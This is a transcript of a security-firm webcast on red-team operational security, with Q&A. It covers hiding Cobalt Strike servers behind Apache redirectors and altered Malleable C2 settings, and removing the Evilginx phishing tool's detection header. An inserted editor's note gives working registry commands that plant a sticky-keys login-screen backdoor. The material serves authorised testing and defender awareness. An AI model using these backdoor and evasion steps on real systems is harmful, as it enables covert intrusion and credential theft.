Also, don't ever use any default or self-signed certificates. Self-signed certificates are very easy to flag or block — it would be very easy to just create a rule that blocks all of them outright. And then there are the default certificates.

Anything that's default in a hacking tool is a bad idea on a red team exercise. So here I've got the fingerprint for the default certificate that comes with Cobalt Strike.

That was just up on the Cobalt Strike blog, so that didn't take any effort for me to get or anything. And I went out to Censys.io and searched for that, and sure enough, I found 362 team servers out there on the Internet that are using this default certificate.
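That kind of fingerprint check is easy to reproduce locally. The sketch below generates a throwaway self-signed certificate and prints its SHA-1 fingerprint — the same style of value searched for on Censys; for a live server you would fetch the certificate with `openssl s_client -connect host:443` first:

```shell
# Generate a throwaway self-signed cert (names/validity are illustrative)
# and compute its SHA-1 fingerprint, the value defenders hunt for:
openssl req -x509 -newkey rsa:2048 -nodes -subj '/CN=localhost' \
  -keyout key.pem -out cert.pem -days 1 2>/dev/null
openssl x509 -in cert.pem -noout -fingerprint -sha1
```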

So I really hope they're not running red team exercises right now — hopefully they're just testing out Cobalt Strike. Something else to think about as you start thinking about these ideas: a lot of hacking tools and tutorials that you find online.

They mention Let's Encrypt as the default certificate authority to get those SSL or TLS certificates. And any kind of default like that, you want to be suspicious of.

They're also free, which makes them very likely to be abused by attackers. Really, the only thing that maybe still makes them worthwhile is that there are a lot of legitimate websites also using Let's Encrypt certificates.

But that's just something to think about. Maybe it would make sense to mix up where you're getting certificates from in future projects, if you've been getting them all from Let's Encrypt.

So next is network services. Just like I mentioned earlier, as threat actors operating on the Internet, we're just like anybody else who's running services and servers out there.

Best practice is not to expose any services that aren't required to be exposed. So if there's anything that you can just block all incoming access to, go ahead and do that.

And if it's something that only the red team needs access to, use SSH port forwarding for the red team to get access to it. The reason I recommend SSH port forwarding instead of iptables rules and IP whitelisting and things like that is that it's kind of easy to mess up the whitelisting or blacklisting rules and accidentally allow too much access — maybe you're letting in too many IP addresses.

But if you just block everything, and the only way to access that port is by forwarding a port over SSH, it's much easier to get that right. Also, change any default ports that do have to be exposed, where they're changeable in the context of whatever you're doing with them.

Of course you wouldn’t change the default ports that were available for a web server because those need to be the default ports. But if it’s something you can change, change it. And also use redirectors as much as possible.

And in the case of any web servers where you're running redirectors — if you have an HTTP or HTTPS beacon, for example — use legitimate web servers like Apache and Nginx to redirect that traffic to your C2 server.

On this next slide, I'm going to walk you through each of those things I just talked about and describe some indicators that came from the Cobalt Strike team server study. This was published on the Cobalt Strike blog.

So none of this came from me — this all came out of a blog post on there. But these really help illustrate some of those things that I was talking about. So indicator number one is TCP port 50050.

That's the default Cobalt Strike team server port. So that's a dead giveaway right there that Cobalt Strike is running on a system, if you see that port 50050 is open. So definitely don't expose that to the Internet.
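One way to keep that port off the Internet while operators still reach it is an SSH local port forward. As a sketch, an ~/.ssh/config entry like the following (the host name and user are placeholders) makes the team server port reachable only on the operator's own loopback after connecting with `ssh teamserver`:

```
Host teamserver
    HostName teamserver.example.com
    User operator
    # Team server port stays bound to loopback on the server; the operator
    # reaches it at 127.0.0.1:50050 on their own machine over the tunnel.
    LocalForward 50050 127.0.0.1:50050
```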

Have all your red team operators connect to the SSH service and then forward their traffic to that port locally, inside the firewall. Also, very similar to that, if you're using DNS for beaconing:

The Cobalt Strike DNS server responds to DNS requests with an IP address of 0.0.0.0. So again, very suspicious — very positive confirmation that it's a Cobalt Strike team server running there.

So that's something you don't want. You can go into the Malleable C2 profile and change that, so that a different default is set and you're not broadcasting to the world that this is a team server.
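The Malleable C2 option that controls this is dns_idle; a profile fragment like the following changes the telltale default (the substitute address here is arbitrary, not a recommendation):

```
# Malleable C2 profile fragment: move the idle DNS response away from
# the default 0.0.0.0 giveaway.
set dns_idle "8.8.4.4";
```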

And then, touching on those redirectors that I talked about on the last slide: if your team server is listening with an HTTP listener and you don't have any content specifically specified for the root of the web server, Cobalt Strike is going to give you a 404 Not Found error.

When you browse to that web root location, it's going to have no content in the page, and it's going to have a Content-Type of text/plain. And that response is a pretty good indicator that there may be a team server running there as well.

In addition to that, JA3S service fingerprinting can be used to add another confirmation that there's probably a team server running.

So this type of fingerprinting — what it does, basically, is look at each different type of network service that's running, be it an Apache web server, an Nginx web server, a Cobalt Strike web server, or whatever else.

Each one is going to generate its own fingerprint whenever it receives incoming traffic. And that fingerprint can be used to identify whatever is there since that fingerprint is going to be the same across other similar web servers.

Well, there are thousands of Apache or Nginx or other dedicated web servers out on the Internet, but there's a relatively small number of web servers that have the same fingerprint Cobalt Strike team servers have — a Java-based web server fingerprint. Because there's such a small number of those servers, that's something blue teams could alert on as a signal that this is probably a Cobalt Strike team server.

But if you have HTTP or HTTPS redirectors set up that are running on real web servers — Apache, Nginx, others like that — and they forward those web requests to your team server, then the fingerprint that gets detected, and the 404 Not Found page displayed for any pages that aren't found, will be the fingerprint and 404 page of that web server.

It's not going to be the one that your team server provides. That way you get a little bit of extra protection, so it's not as obvious that there is a team server running on the other side of that redirector.
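A minimal sketch of such a redirector as an Apache reverse-proxy virtual host — the hostname, ports, and beacon URI are all illustrative, and mod_proxy/mod_ssl plus the usual certificate directives are assumed to be configured:

```apache
<VirtualHost *:443>
    ServerName cdn.example.com
    SSLEngine on
    SSLProxyEngine on
    # Forward only the beacon URI to the team server; every other request
    # is served (and 404'd) by Apache itself, so Apache's fingerprint and
    # error pages are what the blue team sees.
    ProxyPass        /news/ https://127.0.0.1:8443/news/
    ProxyPassReverse /news/ https://127.0.0.1:8443/news/
</VirtualHost>
```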

Lastly, testing new tools. So anytime you use a new tool that you haven’t used before, you want to vet that tool. You want to do three things. You want to make sure that the tool will not harm you or your customer.

You want to identify and mitigate any tells that could give away your attack to your target. And also, number three, you want to make sure that the tool does the thing it's supposed to do.

That's how I prioritize those things. Number three is pretty important, because if it doesn't do what it's supposed to do, there's no point in running it. But you have to go through the process of making sure it's going to cause no harm and that it's not going to give you away,

In addition to making sure it actually does the thing that it’s supposed to do. And these are my steps for vetting a tool over here on the right. I’m not going to claim to be very good at probably any of them, but those are the ones that I recommend.

I’ve also got some recommendations in that bottom bullet for how you can observe the traffic that the tool generates. We don’t always have access to the software that we’re targeting with any new tool.

So the way that I'll take a look at that traffic: if it's clear text, I can just look at it in Wireshark — piece of cake. If it's encrypted, I might want to proxy it through Burp if it's sending web requests.

That way I can see what those web requests are — even if they're encrypted, I can still see what the decrypted request looks like. Also, you can try simulating the target with Ncat or Netcat.
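As a sketch of that listener approach (the port is arbitrary, and exact flag spelling varies between netcat builds):

```shell
# Open a local listener and record whatever the tool under test transmits
# (this is the ncat form; some nc builds use `nc -l -p 8080` instead):
ncat -lv 127.0.0.1 8080 | tee tool_traffic.txt
# ...then point the tool at 127.0.0.1:8080 and read tool_traffic.txt.
```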

You can open up a port and just aim the tool at that port, and you'll see what it's sending to the port. To give you an example of using this process: this is Evilginx, a tool for phishing against web services that have multi-factor authentication enabled.

And so this is actually a situation that I ran into, where I kind of had to go through this process and learn some lessons. This is me running Evilginx for the first time. The first thing I did was download the latest precompiled release from GitHub — key words there.

Number two, I configured a phishlet — that's Evilginx-speak for the configuration that targets whatever website, in this case Office 365. Number three, I generated a lure, which is the landing URL that you're going to send to your phishing victim.

And then I visited the lure in my browser because I wanted to see what this looks like to the person on the other end. And number five, everything looks okay, right? Like the screenshot there looks just fine.

Then I pasted this lure into Google Chat, and everything did not look okay. You'll see in that screenshot that there is a preview of the Rickroll video from YouTube, for some reason, showing up with my URL. And I'm like, why in the world did this happen?

So — sorry, wrong button. I started looking into this, and looking into the source code some, I found that there is a default redirect URL that by default links to this YouTube video.

And there's a comment next to it that says Rickroll. So, easy enough fix: I went in and changed a configuration option with the config command, and I could change that to any website I wanted it to be.

It's not the Rickroll video anymore, so I'm all good. Lesson learned: read the source code and understand those configuration options. Well, that button keeps getting me. Lesson learned, I thought.

But there's more. While looking into that, searching around on the Internet, I found this tweet from Kuba Gretzky, the creator of Evilginx. And the tweet says: tip for blue teams —

look for the X-Evilginx HTTP header in the requests. And I'm like, what X-Evilginx HTTP header?

Well, so at that point I decided I would take a look at the traffic, and I inspected that traffic with Burp Suite. Sure enough, on line number eight there, in the request that Evilginx makes to the Microsoft Office 365 login page,

it was including the X-Evilginx header, which contained as its value the fully qualified domain name of my attack website.

And I definitely didn’t want to leak that information, especially if I was going to be targeting not Microsoft. Like if I’m sending a request to something that’s hosted by the target organization, that would be even worse.

The blue team would have direct access to that information. So I started looking for ways to remove that header. I looked through the settings, I didn’t find any settings to change or disable that header.

I didn't find any mention of it in the documentation. And I also didn't find any references to it whenever I searched the source code — you can see my grep command there. I was trying to search through all the files in the source code that I downloaded from GitHub to see if there was any mention of it, but there was none.
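A search like the one described is a recursive, case-insensitive grep over the source tree. In the sketch below, the directory and file contents are fabricated for illustration — in the real case, the literal header string never matched, because the code assembled it at runtime from scattered fragments:

```shell
# Fabricated mini source tree standing in for the real one:
mkdir -p src
cat > src/http_proxy.go <<'EOF'
package main

// nothing to see here
var hiddenHeader = "X-Evilginx"
EOF
# The baseline hunt: recursive, case-insensitive, with line numbers.
grep -rni 'evilginx' src/
```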

So looking more closely here, I found that in the http_proxy.go file in the source code, there were actually three different sections of code — spread out across several different lines, not all together — that put this header back into the request three separate times. That way, if I removed just one of them, which I did (and then wondered why removing it didn't work), it wouldn't fix the problem.

So after a lot of grepping and a lot of reading through that file, I found it. What really gave it away were phrases like nothing to see here and can't find me.

So I was a little fortunate that those were in there. After that, I removed all those lines from the code, compiled the source code that I had modified, and inspected the outgoing traffic again — and no more X-Evilginx header.

So another lesson learned: always inspect the network traffic. Because if you're like me, you're probably really terrible at reading source code, especially if it's in languages you're not that familiar with.

And you might get some better results if you check out the network traffic. And that’s the end of my webcast. So thank you all for listening.

Ralph May

Michael, great job. Thank you — for your first time, that was smooth. Very smooth, very articulate, very easy to understand.

Michael Allen

I’m glad to hear that.

Ralph May

Yeah. All right. So we do have a couple questions. So I’m going to go through here. The team was doing a pretty good job and the community was doing a good job responding to questions throughout.

This question came from Jim. It says: I have observed that VMs may inhibit some capabilities. Is the presenter recommending using VMs, or has he observed constraints testing with VMs?

Michael Allen

Yeah, I did run into a situation like that — for example, a VPN client that for whatever reason would not run inside of a VM.

So I just have to take those situations on a case by case basis. That particular VPN client, it was something really weird. I don’t even remember what the name of it was, but it was one I hadn’t run into before.

And what I ended up having to do was take an extra computer, install Windows on it, and go with a fresh install on a new machine. That way I still had my relatively safe environment that's not going to leak any other customer data, but I could get that working on it.

But those situations are usually pretty rare in my experience. So I don’t, fortunately I don’t run into that a ton. Otherwise I might have to keep an extra computer or something laying around for that purpose.

Ralph May

This question wasn't asked, but I want to know: what's the one time you got caught that made you really want to start being better at OPSEC?

Michael Allen

Okay. Actually, there were some stories that I had to cut from this presentation because of time. So, one of those stories — let me see if I can go back through and find the slides that were related to it.

It was in regard to cloud service providers. So the IP address kind of relates to this, talking about not using the same source IP address.

Just like you don’t use the same source IP address for everything that you do, you also want to not use the exact same cloud service provider for everything that you do. This happened on a red team that I was on at another company.

So not with Bhis, but it just so happened that we were using the same cloud service provider for all of our red team infrastructure. Now they weren’t the same servers, but they were all hosted by the same company.

So the blue team actually was able to figure that out ahead of time. What happened was for every one of those servers that we stood up, we went out and we registered typo squatted domain names and they got alerts that told them that all these domain names have been registered that look like your company’s domain name.

And they then saw the IP addresses that those were all pointing to, and they went and investigated those IP addresses and found out they’re all pointing to ips that are on the same cloud service provider.

And we don't have any customers or employees who will have connections coming from that cloud service provider, so let's just block all traffic to that cloud service provider. Now, we were really, really successful in getting payloads through to this particular customer.

It got to the point that I was in a chat with new employees — it was an online onboarding process that this company did, because they were a big company and they had employees all over the place.

So they had everybody join, like, a WebEx. And I was in the chat, and I'm literally telling these people: type this command into your computer and run it. And they're doing it, because I'm telling them this is going to fix a microphone issue.

We're getting feedback from your microphone on the conference call, or whatever — and I'm from the help desk, I'm from IT. And they were doing it, and we could see that they were doing it, but we could never get that command and control channel established.

And it was because, ahead of time — before we even knew it — the blue team had already blocked our infrastructure. So, yeah, that's where a bunch of the stuff that I mentioned in here comes from. On that one in particular, they were really, really good at staying on top of us and getting things done ahead of us, before our attack even got going.

Ralph May

All right, everybody, that is the end of the official Black Hills Information Security webcast: OPSEC Fundamentals with Michael Allen. Reminder, he does have a red team class coming up with Wild West Hackin' Fest.

So if you're interested in that, I think I dropped the link in GoToWebinar and in Discord. We hope you enjoyed today's webcast. If you ever need a pen test, you know where to find us. What we're going to do right now is end the official webinar, but we're going to stick around for five or ten minutes, maybe answer your questions.

Also, Deb is going to come back on to the webcast so that we can talk about Backdoors & Breaches for a second, because we've got a cool thing that we think you might like.

So, Michael Allen, thank you so much. You have any final words?

Michael Allen

Nope, I didn’t prepare any final words.

Ralph May

All right, everybody. So the webcast is over, and we're at what's called post-show banter right now — more casual, laid back. My question for you is: do you prefer red team exercises, or do you prefer standalone penetration tests?

Michael Allen

I like red team exercises a lot, because you can get really creative. It's a lot more fun to be like a real attacker, instead of being limited both in terms of time and in what your scope allows you to go after.

So red teams are definitely my favorite, but they are a little more high stress because I get way more into them. So I feel like the stakes are higher with red teams.

It's kind of like you can do whatever you want, but it's also a little bit harder to succeed — you're working against an active defender.

So I guess that probably adds to the fun as well. Yeah, red teams for sure.

Ralph May

Yeah. Someone asked earlier about how to get started in red teams. So they’re in it and they’re like, hey, I want to get in red teams.

So do you have any thoughts on how people can get started red teaming?

Michael Allen

I don’t know what the right answer is, but I can tell you what I did.

Ralph May

Yeah.

Michael Allen

So I started by hacking for fun for a long time. And that's the main thing, I think, in this industry: if you do it for fun, it's going to be easy enough to do it for long enough that you'll get good at it.

So if you get into it for the wrong reasons or anything, then I would kind of recommend staying away from it, because this is the kind of thing where you need to put in a lot of practice.

For people who get good at things, practice is fun; for people for whom practice is work, they have to work really hard.

So that was how I got into hacking to begin with — just hacking for fun for years. And I had an IT background coming out of school and such.

And I started out as a pen tester. I got my first job as a pen tester with Coalfire, and worked my way up in that.

And then, as you become a senior pen tester, that's when they start letting you do red teams — or at least that's how it was when I first got hired there. So I kind of worked my way up from pen testing to doing red teams, and it's just kind of gone from there.

But that would be my recommendation: if you really enjoy hacking, start working your way into a pen testing role, and then try to get into a red teaming role from there.

It might be different with some places where you could get hired. Like some places would probably let you, start doing red teaming right out of the gate. There’s always option of becoming, an independent contractor consultant kind of thing going that route too.

So my answer is not exactly the right answer. It was just my answer.

Ralph May

Kat, a purple teamer, has a comment and a question. As a purple teamer, this was really great and opened my eyes to some things I was missing, especially the Evilginx header.

Any other tips and tricks, rather than going through the whole deck?

Michael Allen

None come to mind right off the top of my head. When I was thinking about this topic, the Evilginx thing just illustrated it so well, because that was one of the times I’ve found something in a tool that was obviously put there to trip up people who didn’t actually pay attention to what the tool was really doing, which included myself.

I guess the fact that I don’t have anything else like that to pull off the top of my head is probably a good indication that there are other things like that happening in stuff I’m doing right now that I don’t even know about.

Ralph May

Mhm. I think Chad said, maybe this is a loaded question, but what is the general amount of time spent on a red team engagement? Are you solely working on one engagement at a time or several at a time?

Michael Allen

That really changes a lot from one red team company, the company performing the red team exercise, to the next. There’s also a big difference between red teams that are internal to an organization versus external, third-party red teams.

So I can really only speak to third-party consulting red teams. At the companies I’ve been at, there are red teams that last quite a while, and usually those are the ones where the customer has specifically said, we want this red team exercise to last for a month, or two months, or three months, or whatever.

Right now, the standard with BHIS is typically two testers for three weeks on the red team. We’ll usually spend anywhere from one week to one and a half weeks on the first part, the gaining-access portion of the red team.

And if we haven’t gotten access somehow by that midway point, we’ll switch over to assumed breach mode. That way the customer gets an idea of what their security posture looks like if somebody does get in.

Now, that said, pretty much everywhere I’ve worked, if it is a short-term red team like that, the testers on it are doing things leading up to the red team if they have any spare time at work, and maybe more people have spare time at work than I do.

I guess I’m pretty bad at time management. But if there is any spare time at work, it’s spent preparing for that red team. That’s something I talk about in the class, too: there are things you can do ahead of time that aren’t necessarily attacks, like reconnaissance and preparation.

You can get things ready before the red team starts so that ideally, if you had enough time, you can just push a button on day one of the red team and some of your attacks are ready to go. Then you can spend the rest of that time looking for those one-off vulnerabilities, the really cool stuff like zero days in web apps or something like that, which Justin Angel on our team is really good at.

He found one of those in the last red team he and I did together. It was really great. But yeah, typically you’re looking at a total of six working weeks: two testers for three weeks, plus whatever time we can add to get a little bit of a head start before that.

Ralph May

We’re going to take about two more questions. We got a bunch of them, so what I’m going to do is send you all the questions, and then if you’re like, hey, here’s an idea to write a blog, or here’s something else that’s in the class, or here’s a future webcast, maybe we can do that.

Next question, I like this one. I like all your questions evenly, but this one I really like a little more. This one’s about remote red teams using an implant, like a Raspberry Pi.

Do you usually connect back to your infrastructure through the client network, or using an out-of-band solution?

Michael Allen

That depends on the context of the implant. If it’s something where the customer has given us access to their network with that implant, we’re usually connecting back through their network.

That’s usually the assumed breach portion; that’s when we would do that type of thing. Other times we’re connecting through some other channel, be it a cellular connection or maybe the guest Wi-Fi in the building next door or something like that.

That’s usually a red team where we’ve gotten physical access covertly somehow, and we plug that drop box in ourselves and use that channel to get back.

Usually the way it works when we use an implant like that on a remote red team is that the customer gives us that access. One thing I like to do whenever possible, instead of getting that access, is to have access to a workstation or a virtual desktop, as though we have compromised an employee’s account and are now working through that account.

I prefer that because it doesn’t give as much of a tell, especially if it’s a remote employee or someone who’s expected to be connecting in remotely that week. The other option is to provide our point of contact with the actual beacon payload, just an executable file, and have them run it on some system in their network, or maybe more than one, and see whether that beacon calls back to us in such a way that the blue team doesn’t pick up the C2 traffic. If so, we’ll just operate from that and go from there, just as if we had actually been successful in the phishing attack, or whatever attack it was that would have gotten that payload to execute on the system.

Ralph May

One more question before we go. For everyone that ordered a Black Hills t-shirt today, they’re super soft, thank you so much. We’re going to donate $2 of each shirt sold to the Rural Tech Fund.

Did you miss the part where we talked about the Rural Tech Fund? Rural Tech Fund, RTF. You can go to ruraltechfund.com.

We’re going to donate $2 to the Rural Tech Fund, so thanks for doing that. And if anybody wants a personal demo, I put Deb’s email in the GoToWebinar chat. All right, so last question.

Has there ever been a time where you were doing your attack and had to stop or switch to blue because the company had another malicious attack happening simultaneously?

Michael Allen

No, there hasn’t been one on a project that I was on. I have heard stories from other testers who did come across something like that. My friend Corey was on a project.

I don’t remember if it was a red team or a pen test, but he was checking remote desktop sessions to see if there were any backdoors installed.

If I remember right, there’s a tool to do that that he was using. But basically, you connect to the remote desktop service, and if they don’t have CredSSP or NLA (Network Level Authentication) enabled, you’ll actually get a login screen in the remote desktop window.

You do things like press Shift five times, which is the Sticky Keys hotkey, and make that little box pop up. Well, if somebody’s compromised that system, or if I’ve compromised that system, because I do this, then I’ll put a backdoor on there so that if you press Shift five times, or press Windows key + U or whatever it is, then instead of the Sticky Keys dialog popping up, a command prompt will pop up, or some other equally useful thing like Task Manager, because some places will alert on a command prompt.

So yeah, he was connecting to these remote desktop services that were facing the Internet, and he hits Shift five times and a command prompt pops up. He talks to the customer and he’s like, did you guys know that this backdoor is installed on this system?

And their immediate reaction was, yeah, we knew that. That’s how our administrators connect remotely into the network when they’re working from home.

And that was not true at all. They were totally breached, and he had to stop the test at that point. When something like that happens, I’m never on the part of the team that goes into blue team mode and helps with any kind of defense, because my background is 100% offensive, so I don’t really have a lot of insight to give there, unfortunately.

But they did have to switch into that incident response mode and start trying to figure out what was going on there.
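[Editor’s note: the sticky-keys-style backdoor Michael describes is classically implemented by abusing the Image File Execution Options (IFEO) registry key to hijack the accessibility binaries. The sketch below is a general illustration of that technique, not necessarily the exact method used in the story; it assumes administrator access on a Windows host, and is shown here so defenders know what to hunt for.]

```shell
:: Hypothetical sketch of the "sticky keys" backdoor (Windows, admin required).
:: Setting a Debugger value under IFEO for sethc.exe makes Windows launch
:: cmd.exe instead whenever Sticky Keys is triggered (Shift pressed 5 times),
:: including at the login screen, where it runs as SYSTEM.
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f

:: The same trick works for utilman.exe, the Windows key + U accessibility helper.
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f

:: Defenders: a Debugger value on either of these keys is a strong indicator
:: of compromise and is easy to audit.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger
```

This is the same class of backdoor that Corey tripped over from the Internet-facing RDP login screen, which is why exposed remote desktop services without NLA are worth checking this way.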

Ralph May

Yeah, there have been a few times we’ve played Backdoors & Breaches internally. And you all are so good at offense that we’re like, all right, so how would you defend against this attack? You’re like...

Michael Allen

Yeah, I don’t know how to defend things. I just break them.

Ralph May

Which is why now we have the purple team and blue team services, just in case you’re like, so you broke all this, now how do you fix it? We’re like, oh, we got a guy for that or a person for that.

All right, everybody, that is the end of the post-show banter today. Thank you so much for sticking around; 660 of you stuck around. Sorry, you have to go back to work now, or it’s nighttime and you’re drinking because you’re overseas, or whatever the case is wherever you’re at in the world.

Thank you so much for joining us today, Michael, thank you for this presentation and your insights and sharing your knowledge with the community. And we’ll see you all next time.

Michael Allen

Bye.

Ralph May

I’m ending the webinar.